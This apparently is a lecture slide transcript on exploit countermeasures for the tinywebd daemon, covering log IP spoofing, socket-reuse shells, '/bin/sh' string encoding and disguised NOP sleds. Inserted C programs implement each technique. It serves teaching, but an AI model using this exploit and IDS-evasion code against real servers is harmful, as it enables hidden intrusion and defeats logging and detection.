
Countermeasures (0x660~0x680)




Presentation Transcript


  1. Countermeasures (0x660~0x680) Jinsoo Kim

  2. Contents • 1. Advanced Camouflages • Spoofing the logged IP address • Logless Exploitation • 2. Socket Reuse • 3. Payload Smuggling • String Encoding • How to hide a sled

  3. 1. Advanced Camouflages • How do we spoof the logged IP address in the tinyweb daemon? • The log entry is built from the client_addr_ptr argument of handle_connection(), so to spoof the IP address we overwrite client_addr_ptr with the address of a sockaddr_in structure we inject ourselves

  4. 1.1 How to spoof the logged IP address in the tinywebd daemon? • First, create a sockaddr_in structure holding the fake address and dump its raw bytes on standard output, so we know exactly what to inject
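The program this slide describes, as an added example written for this page (it is not the slides' own program and not part of tinywebd): build the sockaddr_in that the spoofing exploit injects, dump it as the "\xNN" escapes a shell script could splice into the request, and show what the daemon's logging code would print from it. The address 12.34.56.78, port 0 and the variable name FAKEADDR are constructed sample values.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Fill out[16] with the raw bytes of a sockaddr_in for ip:port, laid out
 * exactly as the process will read it through client_addr_ptr
 * (sizeof(struct sockaddr_in) is 16 on Linux).
 * Returns 0 on success, -1 if ip is not a dotted quad. */
int build_fake_sockaddr(const char *ip, uint16_t port, unsigned char out[16])
{
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof addr);          /* sin_zero padding is all 0x00 */
    addr.sin_family = AF_INET;              /* host byte order: 02 00 on x86 */
    addr.sin_port = htons(port);            /* network byte order */
    if (inet_pton(AF_INET, ip, &addr.sin_addr) != 1)
        return -1;                          /* not an IPv4 address */
    memcpy(out, &addr, 16);
    return 0;
}

/* Render raw bytes as "\xNN" escapes for a shell script (hypothetical
 * FAKEADDR variable). out needs 4*n+1 bytes. Returns the string length. */
int bytes_to_escapes(const unsigned char *raw, size_t n, char *out)
{
    char *p = out;
    for (size_t i = 0; i < n; i++)
        p += sprintf(p, "\\x%02x", raw[i]);
    *p = '\0';
    return (int)(p - out);
}

/* What the logging code sees when it dereferences the injected struct:
 * the address that will appear in the log. Returns 0 on success. */
int logged_address(const unsigned char raw[16], char *buf, size_t len)
{
    struct sockaddr_in addr;
    memcpy(&addr, raw, 16);
    return inet_ntop(AF_INET, &addr.sin_addr, buf, (socklen_t)len) ? 0 : -1;
}

int main(void)
{
    unsigned char raw[16];
    char esc[65], ip[INET_ADDRSTRLEN];
    /* constructed sample values, not from the slides */
    if (build_fake_sockaddr("12.34.56.78", 0, raw) != 0)
        return 1;
    bytes_to_escapes(raw, 16, esc);
    logged_address(raw, ip, sizeof ip);
    printf("FAKEADDR=\"%s\"\nwould be logged as %s\n", esc, ip);
    return 0;
}
```

The two bytes of sin_family are in host byte order, so the dump is specific to the target's endianness; the port and address bytes are in network order and travel unchanged.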

  5. Shell script spoofing the logged IP

  6. Shell script spoofing the logged IP • xtool_tinywebd_spoof.sh (continued)

  7. Stack frame of handle_connection() after the overflow (low addresses at the top, high addresses at the bottom; left: the original frame, right: what the 540-byte fake request writes over it)

       request[500]      fake request
                           request       start of the request
                           request+15    injected sockaddr_in (fake client address)
                           request+100   NOP sled (landing point)
                                         shellcode
       saved ebp         ebp
       return address    request+100 (returns into the sled)
       sockfd            sockfd
       client_addr_ptr   fake sockaddr pointer (request+15)
       logfd             logfd

  8. 1.1 How to spoof the logged IP address in the tinyweb daemon? • Let's see what this exploit does by attaching GDB to the running tinywebd • Calculate the offset and the return address, then set them in xtool_tinywebd_spoof.sh

  9. Calculating the offset and the return address (GDB session: locate the return address, compute the offset, overwrite the return address)

  10. Logless Exploitation • How to exploit tinywebd without leaving any trace in the log file?

  11. 2. Socket Reuse • For an IDS or IPS, the connection to port 31337 opened by our reverse-binding shellcode is a big red flag • Socket reuse: there is no need to open a new connection; the existing socket is reused for the root shell

  12. Finding the address of new_sockfd • Let's find the address of new_sockfd in main() by attaching GDB to the running tinywebd; that is the descriptor the shellcode must reuse
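The effect of socket reuse in plain C, as an added example written for this page (not the slides' or the book's shellcode, and not tinywebd code): once the shellcode has located new_sockfd, it makes that descriptor the shell's stdin, stdout and stderr and executes /bin/sh, so the attacker talks to the shell over the connection that already exists instead of a fresh one to port 31337. A socketpair stands in for the accepted TCP connection; the child plays the exploited server and the parent plays the attacker.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>

/* What the socket-reuse shellcode does after finding new_sockfd: bind the
 * existing connection to fd 0, 1 and 2, then run /bin/sh. No listen(),
 * no connect(), no new port for an IDS to notice. */
static void shell_on_existing_socket(int sockfd)
{
    dup2(sockfd, 0);
    dup2(sockfd, 1);
    dup2(sockfd, 2);
    if (sockfd > 2)
        close(sockfd);
    execl("/bin/sh", "sh", (char *)NULL);
    _exit(127);                         /* only reached if execl fails */
}

/* Demo driver: the child reuses its end of the socket for a shell, the
 * parent sends a command over the same connection and collects the reply.
 * Returns the number of reply bytes, or -1 on failure. */
int run_reuse_demo(const char *command, char *reply, size_t reply_len)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        close(sv[0]);
        shell_on_existing_socket(sv[1]);   /* never returns */
    }
    close(sv[1]);                           /* parent keeps only its end */

    /* send the command plus "exit" so the shell ends and we see EOF */
    if (write(sv[0], command, strlen(command)) < 0 ||
        write(sv[0], "exit\n", 5) < 0) {
        close(sv[0]);
        waitpid(pid, NULL, 0);
        return -1;
    }
    size_t got = 0;
    while (got < reply_len - 1) {
        ssize_t n = read(sv[0], reply + got, reply_len - 1 - got);
        if (n <= 0)
            break;                          /* EOF: shell exited */
        got += (size_t)n;
    }
    reply[got] = '\0';
    close(sv[0]);
    waitpid(pid, NULL, 0);
    return (int)got;
}

int main(void)
{
    char reply[256];
    int n = run_reuse_demo("echo shell over the existing socket\n",
                           reply, sizeof reply);
    if (n < 0) {
        perror("demo");
        return 1;
    }
    fputs(reply, stdout);
    return 0;
}
```

In the real exploit the value of new_sockfd is not known at compile time, which is why the slides locate its stack address with GDB first: the shellcode reads the descriptor number from there before the dup2() calls.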

  13. 3. Payload Smuggling • IDS and IPS systems inspect packets looking for patterns that signify an attack • For example, packets containing the string "/bin/sh" • This can be fairly effective at catching script kiddies • However, it is easily bypassed with custom shellcode that obfuscates itself

  14. String Encoding in Shellcode • To avoid detection by pattern matching, the string is simply encoded and decoded as follows • We add 5 to each byte of the string "/bin/sh" (the terminating NUL included) and push the encoded bytes onto the stack • The shellcode then subtracts 5 from each byte on the stack before using the string

  15. Adding 5 to each byte of "/bin/sh": "/bin" becomes 0x736e6734 and "/sh\x00" becomes 0x056d7834 (little-endian dwords, ready to push)

  16. Stack after the two pushes (low address at the top): ebx -> 0x736e6734, then 0x056d7834 at the higher address

  17. Stack after the decoding loop: ebx -> 0x6e69622f ("/bin"), then 0x0068732f ("/sh\x00"); ecx and edx are set up for the system call, with edx == 0
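The encoding from slides 14 to 17 carried out in C, as an added example that is not the slides' assembly listing: it generalizes the "add 5" step to any add constant, rejects a key that would produce a 0x00 byte (which would terminate the request string before the shellcode is reached), emits the push sequence that places the encoded dwords on the stack in the right order, runs the same subtract-per-byte decoding the shellcode performs, and applies a naive literal-pattern check to show that "/bin/sh" no longer appears in the encoded bytes.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Encode s (terminating NUL included, the shellcode needs it) into
 * little-endian dwords with key added to every byte. A byte that encodes
 * to 0x00 is rejected. Short tails are padded with encoded NULs.
 * Returns the number of dwords, or -1. */
int encode_string(const char *s, uint8_t key, uint32_t *out, int max_out)
{
    size_t len = strlen(s) + 1;
    int n = 0;
    for (size_t i = 0; i < len; i += 4) {
        uint32_t dw = 0;
        for (int b = 0; b < 4; b++) {
            uint8_t plain = (i + b < len) ? (uint8_t)s[i + b] : 0;
            uint8_t enc = (uint8_t)(plain + key);
            if (enc == 0)
                return -1;
            dw |= (uint32_t)enc << (8 * b);   /* byte 0 = lowest address */
        }
        if (n == max_out)
            return -1;
        out[n++] = dw;
    }
    return n;
}

/* Pushes go in reverse order so out[0] lands at the lowest address,
 * where ebx (the execve path argument) will point. Returns text length. */
int emit_pushes(const uint32_t *dw, int n, char *out, size_t out_len)
{
    size_t used = 0;
    for (int i = n - 1; i >= 0; i--) {
        int w = snprintf(out + used, out_len - used,
                         "push 0x%08x\n", (unsigned)dw[i]);
        if (w < 0 || (size_t)w >= out_len - used)
            return -1;
        used += (size_t)w;
    }
    return (int)used;
}

/* The decoder loop the shellcode runs over the bytes on the stack:
 * subtract key from each byte, lowest address first. */
void decode_to_string(const uint32_t *dw, int n, uint8_t key, char *out)
{
    for (int i = 0; i < n; i++)
        for (int b = 0; b < 4; b++)
            out[4 * i + b] = (char)(uint8_t)((dw[i] >> (8 * b)) - key);
}

/* What a naive IDS rule does: look for a literal byte pattern. */
int has_signature(const uint8_t *buf, size_t n, const char *sig)
{
    size_t sl = strlen(sig);
    for (size_t i = 0; i + sl <= n; i++)
        if (memcmp(buf + i, sig, sl) == 0)
            return 1;
    return 0;
}

/* 1 if the encoded bytes no longer contain sig and decode back to s. */
int encoding_hides(const char *s, uint8_t key, const char *sig)
{
    uint32_t dw[16];
    uint8_t raw[64];
    char back[64];
    int n = encode_string(s, key, dw, 16);
    if (n < 0)
        return 0;
    for (int i = 0; i < n; i++)
        for (int b = 0; b < 4; b++)
            raw[4 * i + b] = (uint8_t)(dw[i] >> (8 * b));
    decode_to_string(dw, n, key, back);
    return !has_signature(raw, 4 * (size_t)n, sig) && strcmp(back, s) == 0;
}

int main(void)
{
    uint32_t dw[4];
    char text[64], back[16];
    int n = encode_string("/bin/sh", 5, dw, 4);
    emit_pushes(dw, n, text, sizeof text);
    decode_to_string(dw, n, 5, back);
    printf("%sdecodes to \"%s\", literal hidden: %d\n",
           text, back, encoding_hides("/bin/sh", 5, "/bin/sh"));
    return 0;
}
```

With key 5 the two dwords are exactly the 0x736e6734 and 0x056d7834 of slide 15; a key that makes any byte wrap to 0x00 is refused, which is the check a real encoder has to make before choosing its constant.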

  18. How to hide a sled? • A NOP sled is another signature that network IDS systems detect easily • To avoid this signature, other single-byte instructions can be used in place of NOP • Increment and decrement instructions on registers do the job without affecting the control flow

  19. One-byte instructions (table of single-byte x86 instructions usable in a sled)
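A sled built from single-byte inc/dec instructions, as an added example written for this page (not the slides' own generator): it draws sled bytes from the inc/dec opcodes, checks that every byte really is one of them (so execution can land anywhere in the sled and fall through to the shellcode), and runs a naive "run of 0x90" signature over both a plain NOP sled and the hidden one. The opcode table, the exclusion of inc/dec esp and the run length of 16 are choices made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* x86-32 single-byte opcodes that only touch a general register:
 * 0x40..0x47 = inc eax,ecx,edx,ebx,esp,ebp,esi,edi; 0x48..0x4f = dec.
 * inc/dec esp (0x44, 0x4c) are left out here (our choice): moving the
 * stack pointer by up to the sled length before the shellcode runs is a
 * risk the shellcode may not tolerate. The rest only change a register
 * value and the arithmetic flags, which the shellcode sets up itself. */
static const uint8_t sled_ops[] = {
    0x40, 0x41, 0x42, 0x43, 0x45, 0x46, 0x47,
    0x48, 0x49, 0x4a, 0x4b, 0x4d, 0x4e, 0x4f,
};

/* Fill buf with n sled bytes drawn from sled_ops; seed makes it
 * reproducible. */
void make_sled(uint8_t *buf, size_t n, unsigned seed)
{
    srand(seed);
    for (size_t i = 0; i < n; i++)
        buf[i] = sled_ops[(size_t)rand() % sizeof sled_ops];
}

/* 1 if every byte is one of the allowed single-byte instructions, so
 * execution entering anywhere in buf falls through to its end. */
int sled_is_valid(const uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (memchr(sled_ops, buf[i], sizeof sled_ops) == NULL)
            return 0;
    return 1;
}

/* Longest run of one repeated byte value: the property a classic
 * sled signature keys on. */
size_t longest_repeat(const uint8_t *buf, size_t n)
{
    size_t best = 0, run = 0;
    for (size_t i = 0; i < n; i++) {
        run = (i > 0 && buf[i] == buf[i - 1]) ? run + 1 : 1;
        if (run > best)
            best = run;
    }
    return best;
}

/* Naive IDS rule: flag min_run or more consecutive 0x90 bytes. */
int nop_sled_signature(const uint8_t *buf, size_t n, size_t min_run)
{
    size_t run = 0;
    for (size_t i = 0; i < n; i++) {
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run >= min_run)
            return 1;
    }
    return 0;
}

int main(void)
{
    uint8_t plain[64], hidden[64];
    memset(plain, 0x90, sizeof plain);       /* the classic sled */
    make_sled(hidden, sizeof hidden, 31337); /* constructed sample seed */
    printf("plain  sled: flagged=%d valid=%d\n",
           nop_sled_signature(plain, 64, 16), sled_is_valid(plain, 64));
    printf("hidden sled: flagged=%d valid=%d longest repeat=%zu\n",
           nop_sled_signature(hidden, 64, 16), sled_is_valid(hidden, 64),
           longest_repeat(hidden, 64));
    for (size_t i = 0; i < 16; i++)
        printf("%02x ", hidden[i]);
    putchar('\n');
    return 0;
}
```

The "valid" check is the one worth keeping in any sled generator: a single multi-byte or control-transfer opcode slipped into the table turns a landing point into a crash. A better IDS rule would look for long runs drawn from the whole single-byte-instruction set rather than for 0x90 alone, which is why the slides' table of one-byte instructions matters for both sides.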

  20. Summary
